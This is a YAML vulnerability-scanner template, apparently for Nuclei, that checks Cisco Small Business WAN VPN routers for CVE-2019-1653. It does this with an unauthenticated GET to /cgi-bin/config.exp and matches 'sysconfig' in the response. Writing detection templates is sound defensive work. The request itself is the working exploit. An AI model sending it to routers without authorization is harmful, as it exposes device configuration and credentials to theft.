21 lines
401 B
YAML
21 lines
401 B
YAML
|
id: cve-2019-1653
|
||
|
|
||
|
info:
|
||
|
name: Unauthenticated Cisco Small Business WAN VPN Routers Sensitive Info Disclosure
|
||
|
author: dwisiswant0
|
||
|
severity: high
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/cgi-bin/config.exp"
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|
||
|
- type: word
|
||
|
words:
|
||
|
- "sysconfig"
|
||
|
part: body
|